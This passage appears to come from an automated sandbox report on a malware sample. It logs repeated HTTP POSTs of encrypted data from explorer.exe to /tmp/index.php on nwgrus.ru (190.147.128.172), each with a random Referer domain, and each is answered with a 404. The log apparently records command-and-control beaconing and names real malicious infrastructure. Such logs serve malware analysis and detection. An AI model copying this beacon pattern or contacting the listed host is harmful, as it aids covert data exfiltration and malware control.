Oct 12, 2024 22:29:03.439204931 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49796	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:03.473176003 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nfmmhijnsahycef.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 241 Host: nwgrus.ru
Oct 12, 2024 22:29:03.473217010 CEST	241	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5d 0e d6 fb Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu] AgvP*FfPB/_}JG$(S5x/97(b.L$l _\|o6KXqEeB\SAAvA,z
Oct 12, 2024 22:29:04.555243969 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49802	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:05.088399887 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gmtmmuxeespeb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 333 Host: nwgrus.ru
Oct 12, 2024 22:29:05.088399887 CEST	333	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 5d 57 d5 e2 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu]WR2swd2pPVUf[":o;I&YLS9)wCE;O/<zc@?D*L"lp\|_:ck-2_
Oct 12, 2024 22:29:06.138050079 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49808	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:06.148591042 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oetcuqsferjcffw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: nwgrus.ru
Oct 12, 2024 22:29:06.148591042 CEST	164	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 70 5d a0 eb Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vup]H`DtNYRXC1YGpI8~7.:Uc5"I?E
Oct 12, 2024 22:29:07.234761000 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49819	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:07.251553059 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ykmrlqvmvtweyurg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 294 Host: nwgrus.ru
Oct 12, 2024 22:29:07.251590967 CEST	294	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 57 42 c8 ec Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuWB7\|x"_MQz`Y?a}QDn'L5)\/#WW@1"cvH\_tZeH\|C3bs{^xH?n
Oct 12, 2024 22:29:08.323353052 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49825	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:08.337567091 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://htfrpafyilhcsfrb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: nwgrus.ru
Oct 12, 2024 22:29:08.337567091 CEST	130	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 4e 07 b4 b6 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuN\AM)nLZrB a[3
Oct 12, 2024 22:29:09.404885054 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49832	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:09.419826984 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uphnbpophmmckayq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 322 Host: nwgrus.ru
Oct 12, 2024 22:29:09.419826984 CEST	322	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 67 03 ca fe Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vugm<Fu<q:W*{-emF,N$e.\%Az&W(sOzMT&dN^F:#?gk@,Kd{54
Oct 12, 2024 22:29:10.496790886 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49841	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:10.510524988 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wygnfgjkntpabtiq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 258 Host: nwgrus.ru
Oct 12, 2024 22:29:10.510557890 CEST	258	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 38 15 a8 a9 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu8u7Kquro'AF>S?/J+m0;#[*9BD%rN9K]c@yaY&uoO.
Oct 12, 2024 22:29:11.566257000 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49847	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:11.593549013 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vhkqchnxwnhum.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 308 Host: nwgrus.ru
Oct 12, 2024 22:29:11.593636990 CEST	308	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 52 0a aa f7 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuRQSbao'R4RFJFJ\_KP[0PD+0lPAB3y`\|RzXV@aHKYZIeg{">Ib
Oct 12, 2024 22:29:12.657061100 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49853	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:12.673738956 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nscyrydfuavfv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 213 Host: nwgrus.ru
Oct 12, 2024 22:29:12.673738956 CEST	213	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 52 28 ba fe Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuR(eghpl\|e]'[FB=\6`=M>[7$Nc3-/Z7AL'EG/sSRq>j
